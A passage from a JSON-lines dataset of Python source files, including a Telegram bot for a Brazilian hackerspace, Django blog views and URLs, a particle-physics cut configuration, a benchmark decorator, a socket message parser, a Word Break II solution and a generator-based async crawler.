requests.put(\n f\"{URL_HLEDGER}/add\", json=donation_transaction\n )\n response.raise_for_status()\n\n\n# COMANDOS ESTATICOS:\ndef localizacao(update: Update, context: CallbackContext):\n if update.effective_chat and update.effective_message:\n update.effective_chat.send_venue(\n reply_to_message_id=update.effective_message.message_id,\n venue=Venue(\n title=\"Hackerspace Maringá\",\n address=\"R. Vitória, 943 - Vila Esperanca, Maringá - PR\",\n google_place_id=\"ChIJr9L4qzLR7JQRWi8Anh8JyCI\",\n google_place_type=\"zoo\",\n location=Location(latitude=-23.402309060129333,\n longitude=-51.93850697016083)))\n\n\ndef regras(update: Update, context: CallbackContext):\n if update.effective_chat and update.effective_message:\n update.effective_chat.send_message(\n reply_to_message_id=update.effective_message.message_id,\n text=open(\"static_messages/rules.md\").read(),\n parse_mode=ParseMode.MARKDOWN_V2)\n\n\ndef help(update: Update, context: CallbackContext):\n if update.effective_chat and update.effective_message:\n update.effective_chat.send_message(\n reply_to_message_id=update.effective_message.message_id,\n text=open(\"static_messages/rules.md\").read(),\n parse_mode=ParseMode.MARKDOWN_V2)\n\n\n# COMANDOS DINAMICOS:\ndef newsletter(update: Update, context: CallbackContext):\n newest_file = max(glob.iglob('./news/*.pdf'), key=os.path.getctime)\n if update.effective_chat and update.effective_message:\n update.effective_chat.send_document(\n open(newest_file, \"rb\"),\n reply_to_message_id=update.effective_message.message_id,\n filename=\"newsletter_hs_maringa.pdf\",\n caption=\"Newsletter Hackerspace Maringá\")\n\n\ndef finance_summary(update: Update, context: CallbackContext):\n requests.get(\"http://localhost:5000/accounts/\")\n\n\ndef main() -> None:\n updater = Updater(token=TOKEN, use_context=True)\n\n dispatcher = updater.dispatcher\n\n # COMANDOS ESTATICOS\n dispatcher.add_handler(CommandHandler('address', localizacao))\n dispatcher.add_handler(CommandHandler('rules', regras))\n dispatcher.add_handler(CommandHandler('help', help))\n\n # COMANDOS DINAMICOS\n dispatcher.add_handler(CommandHandler('news', newsletter))\n\n # COMANDOS FINANCEIROS\n dispatcher.add_handler(CommandHandler('donation', add_new_donation))\n\n updater.start_polling()\n\n updater.idle()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"boths/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":7931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"591227248","text":"\n\nfrom xai.brain.wordbase.verbs._stain import _STAIN\n\n#calss header\nclass _STAINING(_STAIN, ):\n\tdef __init__(self,): \n\t\t_STAIN.__init__(self)\n\t\tself.name = \"STAINING\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"stain\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_staining.py","file_name":"_staining.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"55707624","text":"from django.urls import path\n\nfrom .views import AuditiListView, StatusLhaView, StatusReviuView, DashboardView, get_jml_auditi_st\n\napp_name = 'siauApp'\n\nurlpatterns = [\n path('ajax/get_auditi_st/', get_jml_auditi_st, name='getAuditiStUrl'),\n\n path('auditi/', AuditiListView.as_view(), name='auditiListUrl'),\n path('status-lha/', StatusLhaView.as_view(), name='statusLhaUrl'),\n path('status-reviu/', StatusReviuView.as_view(), name='statusReviuUrl'),\n\n path('', DashboardView.as_view(), name='indexUrl'),\n]\n","sub_path":"bagren/siau/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"6513635","text":"''' General config file for plotting and datacards.\nmuon-tau channel\n'''\nfrom htt_plot.tools.cut import Cut, Cuts\n\nchannel = 'mt'\n\n# binning\nfrom htt_plot.channels_configs.htt_common import bins\n\n# variables\nfrom htt_plot.channels_configs.htt_common import variables, datacards_variables, var_name_dict\n\n# cuts\nfrom htt_plot.channels_configs.htt_common import cut_mt_lepton, cut_mt_lepton_loose, cut_mt_lepton_tight, cuts_flags, cuts_vetoes, cut_l1_fakejet, cut_l2_fakejet, cut_os, cut_ss, cut_btag_1, cut_btag_2, cut_btag, cut_nobtag\n\ncut_dy_promptfakeleptons = Cut('l1_gen_match==1 || l1_gen_match==2 || l2_gen_match==1 || l2_gen_match==2')\n\ncuts_l1 = Cuts(\n l1_pt = 'l1_pt >= 21',\n l1_eta = 'abs(l1_eta) <= 2.1',\n l1_iso = 'l1_iso < 0.15',\n l1_vertex = 'abs(l1_d0) < 0.045 && abs(l1_dz) < 0.2',\n)\n\ncuts_l2 = Cuts(\n l2_pt = 'l2_pt >= 23',\n l2_eta = 'abs(l2_eta) <= 2.3',\n l2_iso = 'l2_byVVLooseIsolationMVArun2017v2DBoldDMwLT2017 > 0.5',\n l2_charge = 'abs(l2_q) == 1.',\n l2_vertex = 'abs(l2_dz) < 0.2',\n l2_decaymode = 'l2_decayModeFinding > 0.5',\n)\n\ncuts_against_leptons = Cuts(\n l2_against_e = 'l2_againstElectronVLooseMVA6 > 0.5',\n l2_against_mu = 'l2_againstMuonTight3 > 0.5',\n)\n\n## triggers\ncuts_triggers = Cuts(\n singlemuon_24 = 'trg_singlemuon_24',\n singlemuon_27 = 'trg_singlemuon_27',\n crossmuon_mu24tau20 = 'trg_crossmuon_mu24tau20',\n crossmuon_mu20tau27 = 'trg_crossmuon_mu20tau27',\n)\n\ncut_triggers = cuts_triggers.any()\n\nbasic_cuts = cuts_flags.all() & cuts_vetoes.all() & cut_triggers & cut_os & cuts_against_leptons.all() & cuts_l1.all() & cuts_l2.all()\n\n## iso\ncuts_iso = Cuts(\n l2_VTight = 'l2_byVTightIsolationMVArun2017v2DBoldDMwLT2017 > 0.5',\n l2_Tight = 'l2_byTightIsolationMVArun2017v2DBoldDMwLT2017 > 0.5',\n l2_VLoose = 'l2_byVLooseIsolationMVArun2017v2DBoldDMwLT2017 > 0.5',\n l2_VVLoose = 'l2_byVVLooseIsolationMVArun2017v2DBoldDMwLT2017 > 0.5',\n)\n\n## cut embedding + no fakes (for MC)\n\ncut_embed = Cut('l1_gen_match == 4 && l2_gen_match == 5')\n\ncut_not_embed = ~cut_embed\n\ncut_fakes = Cut('l2_gen_match == 6')\n\ncut_not_fakes = ~cut_fakes\n\ncut_not_fakes_not_embed = cut_not_embed & cut_not_fakes\n\n## datacards\ncuts_datacards = Cuts(\n ZTT = 'l2_gen_match == 5',\n ZL = 'l2_gen_match < 6 && !(l2_gen_match == 5)',\n ZJ = 'l2_gen_match == 6',\n TTT = 'l2_gen_match == 5',\n TTJ = '!(l2_gen_match == 5)',\n VVT = '(l2_gen_match == 5)',\n VVJ = '!(l2_gen_match == 5)',\n WJ = '1',\n jetFakes = '1',\n data = '1',\n embed = 'l1_gen_match == 4 && l2_gen_match == 5',\n)\ncuts_datacards['ZLL'] = cuts_datacards['ZL'] | cuts_datacards['ZJ']\ncuts_datacards['TT'] = cuts_datacards['TTT'] | cuts_datacards['TTJ']\ncuts_datacards['VV'] = cuts_datacards['VVT'] | cuts_datacards['VVJ']\n\ncuts_datacards['TTL'] = cuts_datacards['ZL']\ncuts_datacards['VVL'] = cuts_datacards['ZL']\n\nfor VV_key in ['VVT', 'VVJ', 'VVL']:\n for process_type in ['Diboson', 'singleTop', 'EWK']:\n cuts_datacards['{}_{}'.format(process_type, VV_key)] = cuts_datacards[VV_key]\nfrom htt_plot.channels_configs.htt_common import datacard_processes\n\n# weights\nfrom htt_plot.channels_configs.htt_common import weights\nweights['MC'] = weights['l2_MC']\n\nemb_weight_simulation_sf = Cut('weight_generator')\nemb_weight_scale_factor = Cut('weight_embed_DoubleMuonHLT_eff * weight_embed_muonID_eff_l1 * weight_embed_muonID_eff_l2')\nemb_weight_lepton_sf = Cut('l1_weight_idiso*(l1_weight_trig_mt*(l1_pt>25)+((0.81*(l1_pt>=21 && l1_pt<22) + 0.82*(l1_pt>=22 && l1_pt<23) + 0.83*(l1_pt>=23))*(l1_pt<25)))')\nemb_weight_tau_leg_weight = Cut('(l1_pt>25)+(l1_pt >= 21 && l1_pt<25)*((l2_pt>=20 && l2_pt<25)*0.12714+(l2_pt>=25 && l2_pt<30)*0.46930+0.71983*(l2_pt>=30 && l2_pt<35) + 0.75209*(l2_pt>=35 && l2_pt<40) + 0.78164*(l2_pt>=40 && l2_pt<45) + 0.83241*(l2_pt>=45 && l2_pt<50) + 0.86694*(l2_pt>=50 && l2_pt<60) + 0.89966*(l2_pt>=60 && l2_pt<80) + 0.88534*(l2_pt>=80 && l2_pt<100) + 0.90095*(l2_pt>=100 && l2_pt<150) + 0.84402*(l2_pt>=150 && l2_pt<200) + (l2_pt>=200))')\nemb_weight_emb_tau_id = Cut('(l2_gen_match==5)*0.97+(l2_gen_match!=5)*1.0')\nemb_weight_emb_veto = Cut('(l1_gen_match==4 && l2_gen_match==5)*1.0')\n\nweights['embed'] = emb_weight_simulation_sf * emb_weight_scale_factor * emb_weight_lepton_sf * emb_weight_tau_leg_weight * emb_weight_emb_tau_id * emb_weight_emb_veto #* Cut('2.650559811')\n\nfor w in ['embed_track_1prong_up', 'embed_track_1prong_down', 'embed_track_3prong_up', 'embed_track_3prong_down']:\n weights[w] = weights['embed']\n\nweights['l1_fake'] = Cut('1.0')\nweights['l2_fake'] = Cut('l2_fakeweight')\n\n# datasets\nimport htt_plot.datasets.lucas_mt as datasets\n\ncut_signal = cuts_iso['l2_Tight'] & basic_cuts\n\n# categories\n\ncategories = {\n 'nobtag_tight' : cut_nobtag & cut_mt_lepton_tight,\n 'btag_tight' : cut_btag & cut_mt_lepton_tight,\n 'nobtag_loosemt' : cut_nobtag & cut_mt_lepton_loose,\n 'btag_loosemt' : cut_btag & cut_mt_lepton_loose,\n 'nobtag_Vloosemt' : cut_nobtag & ~cut_mt_lepton,\n 'btag_Vloosemt' : cut_btag & ~cut_mt_lepton,\n }\n\nmerging_categories = {\n 'nobtag' : ['nobtag_tight', 'nobtag_loosemt'],\n 'btag' : ['btag_tight', 'btag_loosemt'],\n 'tight' : ['nobtag_tight', 'btag_tight'],\n 'loosemt' : ['nobtag_loosemt', 'btag_loosemt'],\n 'Vloosemt' : ['nobtag_Vloosemt', 'btag_Vloosemt'],\n }\nmerging_categories['inclusive'] = merging_categories['btag']+merging_categories['nobtag']\nmerging_categories['allmt'] = merging_categories['inclusive']+merging_categories['Vloosemt']\n\nbasic_cuts_btag = basic_cuts & cut_btag\ncut_signal_btag = cuts_iso['l2_Tight'] & basic_cuts_btag\n\nbasic_cuts_nobtag = basic_cuts & cut_nobtag\ncut_signal_nobtag = cuts_iso['l2_Tight'] & basic_cuts_nobtag\n\n","sub_path":"channels_configs/mt.py","file_name":"mt.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"106556631","text":"import time\nimport pprint\n\nclass bench:\n\tdef __init__(self):\n\t\tself.__func = {}\n\n\tdef getFuncEntry(self):\n\t\treturn {\"timeCalled\":0, \"avgTime\":0, \"times\":[], \"slowest\":0, \"fastest\":0, \"total time\":0}\n\n\tdef called(self, funcName):\n\t\tif(not funcName in self.__func.keys()):\n\t\t\tself.__func[funcName] = self.getFuncEntry()\n\t\tself.__func[funcName][\"timeCalled\"] += 1\n\n\tdef executed(self, funcName, timeExec):\n\t\tself.__func[funcName][\"times\"].append(timeExec)\n\n\tdef compute(self):\n\t\tfor func in self.__func.keys():\n\t\t\tminTime = 99999999999999999999999999999999999\n\t\t\tmaxTime = 0\n\t\t\taccumulator = 0\n\t\t\tfor t in self.__func[func][\"times\"]:\n\t\t\t\tminTime = min(t, minTime)\n\t\t\t\tmaxTime = max(t, maxTime)\n\t\t\t\taccumulator += t\n\t\t\tself.__func[func][\"avgTime\"] = accumulator/self.__func[func][\"timeCalled\"]\n\t\t\tself.__func[func][\"slowest\"] = maxTime\n\t\t\tself.__func[func][\"fastest\"] = minTime\n\t\t\tself.__func[func][\"total time\"] = accumulator\n\n\tdef show(self):\n\t\tnewDic = {}\n\t\tfor f in self.__func.keys():\n\t\t\tnewEntry = {}\n\t\t\tfor f2 in self.__func[f].keys():\n\t\t\t\tif(f2 != \"times\"):\n\t\t\t\t\tnewEntry[f2] = self.__func[f][f2]\n\t\t\tnewDic[f] = newEntry\n\t\tpp = pprint.PrettyPrinter(indent = 4)\n\t\tprint()\n\t\tpp.pprint(newDic)\n\t\tprint()\n\n\n\nBENCH = bench()\n\ndef timeit(method):\n\n\tdef timed(*args, **kw):\n\t\tBENCH.called(repr(method))\n\t\tts = time.time()*1000\n\t\tresult = method(*args, **kw)\n\t\tte = time.time()*1000\n\t\tBENCH.executed(repr(method), te-ts)\n\t\treturn result\n\n\treturn timed","sub_path":"Basic/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"255464036","text":"\nfrom django.shortcuts import render, redirect, get_object_or_404\nfrom django.http import HttpResponse, Http404\n\nimport datetime\nfrom datetime import timedelta\nfrom .models import Comment, Posts\nfrom .forms import PostForm, CommentForm\n\n\ndef post_list(request):\n post_list = [i for i in Posts.objects.all()]\n context = {\n 'post_list': post_list\n }\n return render(request, 'Post/post_list.html', context)\n\n\ndef post_detail(request, id):\n try:\n post = Posts.objects.get(pk=id)\n except Posts.DoesNotExist:\n raise Http404(\"Post was not found\")\n context = {\n 'posts': post\n }\n return render(request, 'Post/post_details.html', context)\n\ndef new_post(request):\n form = PostForm(request.POST or None)\n if request.method == \"POST\":\n if form.is_valid():\n form.save()\n return redirect('post_list')\n context = {\n 'form': form\n }\n return render(request, 'Post/post_form.html', context)\n\ndef update_post(request, id):\n updated_post = get_object_or_404(Posts, id=id)\n form = PostForm(request.POST or None, instance=updated_post)\n if form.is_valid():\n form.save()\n return redirect(post_list)\n return render(request, 'Post/post_form.html', {'form': form})\n\ndef delete_post(request, id):\n deleted_post = Posts.objects.get(pk=id)\n deleted_post.delete()\n return redirect(post_list)\n\ndef delete_all_posts(request):\n all_posts = Posts.objects.all()\n all_posts.delete()\n return redirect(post_list)\n\ndef create_comment(request, id):\n post = get_object_or_404(Posts, pk=id)\n if request.method == \"POST\":\n form = CommentForm(request.POST)\n if form.is_valid():\n comment = form.save()\n comment.post = post\n comment.save()\n return redirect('post_list')\n else:\n form = CommentForm\n context = {\n 'form': form\n }\n return render(request, 'Comment/add_comment.html', context)","sub_path":"Week 7/Blog/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"328893436","text":"import socket\nimport struct\nimport pprint\n\nSERVER_FILENAME = \"server_storage.data\"\nSIZE_LINE_BYTE = 2 # Each bytearray is 2 bytes big.\nSIZE_DATA_DEFAULT = 256 # Default data size 2*(1 KB)\n\nSIZE_MSG_LENGTH = 2 # 2 byte of message size\nSIZE_MSG_TYPE = 1 # one byte message type\nSIZE_OFFSET = 8 # 64 bit offset\nSIZE_READ_SIZE = 2 # 2 byte of read size\n\n\nMAX_SEEK = 50000\n#LOOPBACK_ADDR = '127.0.0.1'\nLOOPBACK_ADDR = '10.254.0.7'\n# NUMBER_OF_SERVERS = 1\nMAX_NUMBER_OF_CLIENT = 1\nMAX_CLIENTS_TO_SERVE = 1\n\n\n\nSERVER_TCP_PORT = 20000 \nBACKEND_TCP_PORT = 25700 \n\nclass MsgType:\n READ_MSG = 1\n WRITE_MSG = 2\n READ_SUCCESS_ACK = 3\n WRITE_SUCCESS_ACK = 4\n ERROR = 5\n\nclass Message:\n def __init__( self, msgType, offset, readSize, buff ):\n self.type = msgType\n self.offset = offset\n self.readSize = readSize\n self.buffer = buff\n\n\nclass ParsingError( Exception ):\n pass\n\nclass ConnectionClosed:\n pass\n\ndef ParseRawMsg( rawMsg ):\n # print( \"ParseRawMsg called with %d bytes\" % len (rawMsg) )\n # pprint.pprint( \"ParseRawMsg called with: %s\" % rawMsg )\n # pprint.pprint( \"ParseRawMsg called\" )\n readSize = None\n offset = None\n buff = None\n\n parseLocation = 0\n msgType = struct.unpack( \"b\", rawMsg[ parseLocation : parseLocation + SIZE_MSG_TYPE ] )[ 0 ]\n # pprint.pprint( \"msgType: %s ==> %d \" % ( rawMsg[ parseLocation : parseLocation + SIZE_MSG_TYPE ], msgType))\n parseLocation += SIZE_MSG_TYPE\n\n if msgType == MsgType.READ_MSG:\n offset = struct.unpack( \"Q\", rawMsg[ parseLocation : parseLocation + SIZE_OFFSET ] )[ 0 ]\n parseLocation += SIZE_OFFSET\n readSize = struct.unpack( \"H\", rawMsg[ parseLocation : parseLocation + SIZE_READ_SIZE ] )[ 0 ]\n parseLocation += SIZE_READ_SIZE\n # pprint.pprint( \"ReadMsg(offset=%s, size=%s)\" % (offset, readSize))\n\n elif msgType == MsgType.WRITE_MSG:\n offset = struct.unpack( \"Q\", rawMsg[ parseLocation : parseLocation + SIZE_OFFSET ] )[ 0 ]\n parseLocation += SIZE_OFFSET\n buff = rawMsg[ parseLocation : ]\n parseLocation += len( buff )\n # pprint.pprint( \"WriteMsg(offset=%s, buffer size=%d, data[0:9] = %s)\" % (offset, len(buff), buff[0:9] ) )\n\n elif msgType == MsgType.READ_SUCCESS_ACK:\n buff = rawMsg[ parseLocation : ]\n parseLocation += len( buff )\n # pprint.pprint( \"ReadAck received. buff[0:9] = %s\" % (buff[0:9]))\n\n elif msgType == MsgType.WRITE_SUCCESS_ACK:\n # pprint.pprint( \"WriteAck\")\n pass\n\n else:\n pprint.pprint( \"rawMsg: %s\" % rawMsg )\n raise ParsingError( \"Unknown message type %d\" % msgType)\n\n if parseLocation != len( rawMsg ):\n raise ParsingError( \"Error calculating parseLocation\")\n\n\n return Message( msgType, offset, readSize, buff )\n","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"337760858","text":"# Given a non-empty string s and a dictionary wordDict containing a list of non-empty words, add spaces in s to construct a sentence where each word is a valid dictionary word. Return all such possible sentences.\n#\n# Note:\n#\n# The same word in the dictionary may be reused multiple times in the segmentation.\n# You may assume the dictionary does not contain duplicate words.\n# Example 1:\n#\n# Input:\n# s = \"catsanddog\"\n# wordDict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"]\n# Output:\n# [\n# \"cats and dog\",\n# \"cat sand dog\"\n# ]\n# Example 2:\n#\n# Input:\n# s = \"pineapplepenapple\"\n# wordDict = [\"apple\", \"pen\", \"applepen\", \"pine\", \"pineapple\"]\n# Output:\n# [\n# \"pine apple pen apple\",\n# \"pineapple pen apple\",\n# \"pine applepen apple\"\n# ]\n# Explanation: Note that you are allowed to reuse a dictionary word.\n# Example 3:\n#\n# Input:\n# s = \"catsandog\"\n# wordDict = [\"cats\", \"dog\", \"sand\", \"and\", \"cat\"]\n# Output:\n# []\n#\n# 解题思路:这道题不只像word break那样判断是否可以分割,而且要找到所有的分割方式,那么我们就要考虑dfs了。\n# 不过直接用dfs解题是不行的,为什么?因为决策树太大,如果全部遍历一遍,时间复杂度太高,无法通过oj。\n# 那么我们需要剪枝,如何来剪枝呢?使用word break题中的动态规划的结果,在dfs之前,\n# 先判定字符串是否可以被分割,如果不能被分割,直接跳过这一枝。实际上这道题是dp+dfs。\n\n\nclass Solution:\n def wordBreak(self, s, wordDict):\n \"\"\"\n :type s: str\n :type wordDict: List[str]\n :rtype: List[str]\n \"\"\"\n\n def check(un_processed):\n dp = [False for _ in range(len(un_processed) + 1)]\n dp[0] = True\n for i in range(1, len(un_processed) + 1):\n for k in range(i):\n if dp[k] and un_processed[k:i] in wordDict:\n dp[i] = True\n return dp[len(un_processed)]\n\n def dfs(s, stringlist):\n if check(s):\n if len(s) == 0: self.result.append(stringlist[1:])\n for i in range(1, len(s) + 1):\n if s[:i] in wordDict:\n dfs(s[i:], stringlist + ' ' + s[:i])\n\n self.result = []\n dfs(s, \"\")\n return self.result","sub_path":"src/140_Word_Break_II.py","file_name":"140_Word_Break_II.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"441066783","text":"import socket\n \nfrom collections import deque\nfrom selectors import DefaultSelector, EVENT_WRITE, EVENT_READ\n\nselector = DefaultSelector()\n\"\"\"\n 从本质上来说,python的协程就是事件驱动(selectors的事件注册)加上生成器来实现的。\n 其中涉及到 Queue, Task, Future,等等Acyncio携程的对象原理\n 同时,还有socket编程的实现,也是帮助理解requests的好例子。\n\"\"\"\n\n\nclass Future:\n def __init__(self):\n self.result = None\n self._callbacks = []\n\n def add_done_callback(self, fn):\n self._callbacks.append(fn)\n\n def set_result(self, result):\n self.result = result\n for callback in self._callbacks:\n callback(self)\n \nclass AsyncRequest:\n def __init__(self, host, url, port, timeout=5):\n self.sock = socket.socket()\n self.sock.settimeout(timeout)\n self.sock.setblocking(False)\n self.host = host\n self.url = url\n self.port = port\n self.method = None\n\n def get(self):\n self.method = 'GET'\n self.request = '{} {} HTTP/1.0\\r\\nHost: {}\\r\\n\\r\\n'.format(self.method, self.url, self.host) \n return self\n\n def read(self, sock):\n f = Future()\n\n def on_readable(conn, mask):\n data = sock.recv(4096) \n #conn.send(data) # Hope it won't block\n f.set_result(data)\n\n selector.register(sock.fileno(), EVENT_READ, on_readable)\n chunk = yield f # Read one chunk.\n selector.unregister(sock.fileno())\n return chunk\n\n def read_all(self, sock):\n response = []\n # Read whole response.\n chunk = yield from self.read(sock)\n while chunk:\n response.append(chunk)\n chunk = yield from self.read(sock)\n\n return b''.join(response)\n\n def on_connected(self, key, mask):\n self.f.set_result(None)\n\n def process(self):\n if self.method is None:\n self.get()\n try:\n self.sock.connect((self.host, self.port))\n except BlockingIOError:\n pass\n self.f = Future()\n selector.register(self.sock.fileno(),\n EVENT_WRITE,\n self.on_connected)\n yield self.f\n selector.unregister(self.sock.fileno())\n\n self.sock.send(self.request.encode('ascii'))\n\n chunk = yield from self.read_all(self.sock)\n return chunk\n\n \nclass Task(Future):\n def __init__(self, coro):\n super().__init__()\n self.coro = coro\n f = Future()\n f.set_result(None)\n self.step(f)\n\n def step(self, future):\n try:\n next_future = self.coro.send(future.result)\n if next_future is None:\n return\n except StopIteration as exc:\n self.set_result(exc.value)\n return\n next_future.add_done_callback(self.step)\n \nclass EventLoop:\n stopped = False\n select_timeout = 5\n\n def run_until_complete(self, coros):\n tasks = [Task(coro) for coro in coros]\n try:\n self.run_forever()\n except:\n pass\n\n def run_forever(self):\n while not self.stopped:\n events = selector.select(self.select_timeout)\n if not events:\n raise SelectTimeout('轮询超时')\n for event_key, event_mask in events:\n callback = event_key.data\n callback(event_key, event_mask)\n\n def close(self):\n self.stopped = True\n\nloop = EventLoop()\ndef get_event_loop():\n return loop\n\nclass Queue:\n def __init__(self):\n self._q = deque()\n self.size = 0\n\n def put(self, item):\n self.size += 1\n self._q.append(item)\n\n def get(self):\n item = self._q.popleft()\n return item\n\n def task_done(self):\n self.size -= 1\n if self.size == 0:\n self.empty_callback()\n\nclass AsyncWorker(Queue):\n def __init__(self, coroutine, workers=10, loop_timeout=5):\n super().__init__()\n self.func = coroutine\n self.stopped = False\n self.ev_loop = get_event_loop()\n self.ev_loop.select_timeout = loop_timeout\n self.workers = workers\n self.result_callbacks = []\n\n def work(self):\n def _work():\n while not self.stopped:\n item = None\n try:\n item = self.get()\n except IndexError:\n yield None\n result = yield from self.func(item)\n self.task_done()\n for callback in self.result_callbacks:\n callback(result)\n self.tasks = []\n for _ in range(self.workers):\n self.tasks.append(_work())\n self.ev_loop.run_until_complete(self.tasks)\n\n def add_result_callback(self, func):\n self.result_callbacks.append(func)\n\n def empty_callback(self):\n self.ev_loop.close()\n\ndef fetch(url):\n request = AsyncRequest('www.baidu.com', url, 80)\n\n data = yield from request.process()\n return data\n\ndef get_page(url):\n page = yield from fetch(url)\n return page\n\ndef async_way():\n ev_loop = get_event_loop()\n ev_loop.run_until_complete([\n get_page('/s?wd={}'.format(i)) for i in range(100)\n ])\n\ndef print_content_length(data):\n print(len(data))\n\nif __name__=='__main__':\n \n async_worker = AsyncWorker(get_page, workers=20)\n async_worker.add_result_callback(print_content_length)\n for i in range(15):\n async_worker.put('/s?wd={}'.format(i))\n async_worker.work()\n\n\n# class TaskAsync(one.Ext):\n def __init__(self, taskprocfunc, resprocfunc, loop = None, workers=10):\n super().__init__()\n\n self.__taskqueue = []\n self.processfunc = taskprocfunc\n self.resprocfunc = resprocfunc\n self.ev_loop = loop if loop else asyncio.get_event_loop()\n self.workers = workers\n self.result_callbacks = []\n\n def addtask(self, item):\n self.__taskqueue.append(item)\n\n async def __run(self):\n async def _produce(queue):\n for item in self.__taskqueue:\n job = await self.processfunc(item, self.ev_loop)\n await queue.put(job)\n for callback in self.result_callbacks:\n callback(job)\n async def _consume(queue):\n while True:\n job = await queue.get()\n res = self.resprocfunc(job)\n queue.task_done() \n\n queue = asyncio.Queue()\n\n # create work task list.\n consumers = [asyncio.ensure_future(_consume(queue), loop = self.ev_loop) for _ in range(self.workers)]\n\n # create work task list.\n await _produce(queue)\n await queue.join()\n print('join')\n\n # cancel consumer\n for consumer in consumers:\n consumer.cancel()\n\n def go(self): \n # run.\n result = self.ev_loop.run_until_complete(self.__run())\n\n # close loop\n self.ev_loop.close()\n\n return result\n\n def add_result_callback(self, func):\n self.result_callbacks.append(func)\n\n def empty_callback(self):\n self.ev_loop.close()\n\n\n# class SecRead(log.datelog, metaclass=ABCMeta):\n \"\"\"docstring for Stock\"\"\"\n def __init__(self, begin = None, end = None, doread = False, doparse = False):\n super(SecRead, self).__init__(begin, end)\n\n self._doread = doread\n self._doparse = doparse\n\n self._url = ''\n\n @abstractproperty\n def _datasourcepath(self):\n pass\n\n @abstractmethod\n def _getdatafilepath(self, year):\n pass\n\n def __daterange(self, begin, end):\n return pd.date_range(begin, end, freq='B')\n\n\n @abstractmethod\n def formatdate(self, date):\n pass\n\n def __queryurl(self, date):\n return self._url % date\n\n @abstractmethod\n def _getheader(self):\n pass\n\n def _replace(self, cont, rep, val = np.nan):\n cont[(cont == rep)] = val\n return cont\n\n @abstractmethod\n def constructdataset(self, cont):\n pass \n\n @abstractmethod\n def parsecontent(self, cont):\n pass \n\n async def __fetch(self, dayurl, loop):\n\n if not dayurl:\n return None\n\n max_tries = 3\n headers = self._getheader()\n failedparsedates = []\n \n day = dayurl[0]\n url = dayurl[1]\n\n result = None\n\n async with aiohttp.ClientSession(loop=self.loop) as session:\n tries = 0\n exception = None\n\n response = None\n while tries < max_tries:\n try:\n response = await session.get(\n url, headers = headers, allow_redirects=False)\n\n # redirect\n if webio.is_redirect(response):\n location = response.headers['location']\n url = urllib.parse.urljoin(url, location)\n tries = 0\n continue\n\n break\n except aiohttp.ClientConnectionError as conn_error:\n exception = conn_error\n print(conn_error)\n break # connection problem \n except aiohttp.ClientError as client_error:\n print(client_error)\n LOGGER.info('try %r for %r raised %r', tries, url, client_error)\n exception = client_error\n\n tries += 1\n\n if response is None:\n return day, None\n # # connection error stop parse.\n # if isinstance(exception, aiohttp.ClientConnectionError):\n # break\n # else:\n # continue\n\n try:\n # response.read()是一个异步操作,这意味着它不会立即返回结果,仅仅返回生成器。\n # 故而需要在response.read()前加上await关键字即可修复。如下:\n body = await response.read()\n\n if response.status == 200:\n result = body\n elif response.status != 404:\n failedparsedates.append(day)\n print(day, ': ', response.status)\n # else:\n # print(day, ': ', response.headers)\n # Example:\n # 2017-01-02 00:00:00 : \n finally:\n await response.release()\n\n return day, result\n\n def __parsedata(self, dayandcont):\n \n try: \n\n day = dayandcont[0]\n cont = dayandcont[1]\n\n # init the data structure \n # if not dataarr.size: \n # parsedata = self.constructdataset(cont) \n \n # parsecontent.\n res, cont = self.parsecontent(cont)\n\n print(cont)\n if not res:\n return None\n\n return cont\n except asyncio.CancelledError:\n pass\n\n return None\n \n def parsedataonline(self, data, duringdaterange):\n self.loop = asyncio.get_event_loop()\n session = aiohttp.ClientSession(loop=self.loop)\n try:\n\n self.parsedata = xr.Dataset()\n self.parsedateseq = []\n self.parsedataarr = np.array([])\n\n async_worker = coro.TaskAsync(self.__fetch, self.__parsedata, workers=20, loop = self.loop)\n \n for day in duringdaterange: \n url = self.__queryurl(self.formatdate(day.date()))\n if not url:\n raise(ValueError('failed to get request url')) \n break\n \n async_worker.addtask((day, url))\n\n result = async_worker.go()\n # print(result)\n\n except Exception as err:\n print('Error happen while doing parsedataonline:', err)\n\n finally:\n #reporting.report(crawler)\n \n session.close()\n\n\n # replace null value with np.nan.\n return data\n\n def readdata(self, fromdate = None, todate = None, doparse = True, dsaveifparsed = True):\n \"\"\" read data and merge parsed data from line if needed.\n \"\"\"\n # correct date first.\n fromdate = self.getvaliddate(fromdate, True)\n todate = self.getvaliddate(todate, False)\n\n if todate > dateutil.today():\n todate = dateutil.today()\n \n data = xr.Dataset()\n\n if (todate < fromdate):\n raise(ValueError('fromdate is earlier than to date'\n 'readdata failed'))\n\n # data file is saved by year.\n #\n for year in range(fromdate.year, todate.year + 1):\n datafilepath = self._getdatafilepath(year)\n if os.path.isfile(datafilepath): \n datafromfile = xr.open_dataset(datafilepath, autoclose = True)\n if datafromfile:\n # if data: \n # data['reference_time'] = None\n\n data = xr.merge([data, datafromfile]) \n\n # data parse and merge\n # \n if not doparse: \n if data:\n data = data.sel(date = slice(fromdate, todate))\n return data\n\n if data:\n begin = data.indexes['date'][0] \n end = data.indexes['date'][-1]\n\n duringdate = None\n if pd.Timestamp(fromdate) < begin: \n duringdate = 